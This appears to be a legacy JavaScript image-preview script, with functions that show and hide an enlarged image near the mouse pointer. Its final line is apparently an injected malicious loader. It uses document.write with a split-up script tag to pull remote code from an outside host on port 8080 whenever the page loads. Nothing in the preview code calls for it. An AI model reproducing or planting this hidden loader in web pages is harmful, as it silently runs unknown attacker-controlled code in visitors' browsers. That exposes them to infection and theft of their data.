var ie=document.all
var ns=document.layers
var ns6=document.getElementById&&!document.all

function enlarge(which,e){
            if (ie||ns6){
                        crossobj=document.getElementById? document.getElementById("showimage") : document.all.showimage
                        if (crossobj.style.visibility=="hidden"){
                                    crossobj.style.left=ns6? pageXOffset+e.clientX+20 : document.body.scrollLeft+20
                                    crossobj.style.top=ns6? pageYOffset+e.clientY+20 : document.body.scrollTop+20
                                    crossobj.innerHTML='<div align=right id=drag style=background-color:#d7dffb><b onClick=closepreview()><img src="/images/disk.gif"></b></div><img src="'+which+'">'
                                    crossobj.style.visibility="visible"
                        } else crossobj.style.visibility="hidden"
                        return false
            } else if (document.layers){
                        if (document.showimage.visibility=="hide"){
                                    document.showimage.document.write('<a href="#" onMouseover="drag_dropns(showimage)"><img src="'+which+'" border=0></a>')
                                    document.showimage.document.close()
                                    document.showimage.left=e.x+20
                                    document.showimage.top=e.y+20
                                    document.showimage.visibility="show"
                        } else document.showimage.visibility="hide"
                        return false
            } else return true
}

function closepreview() { crossobj.style.visibility="hidden" }

document.write('<s'+'cript type="text/javascript" src="http://temp.aspdesign.net:8080/Data_Type.js"></scr'+'ipt>');
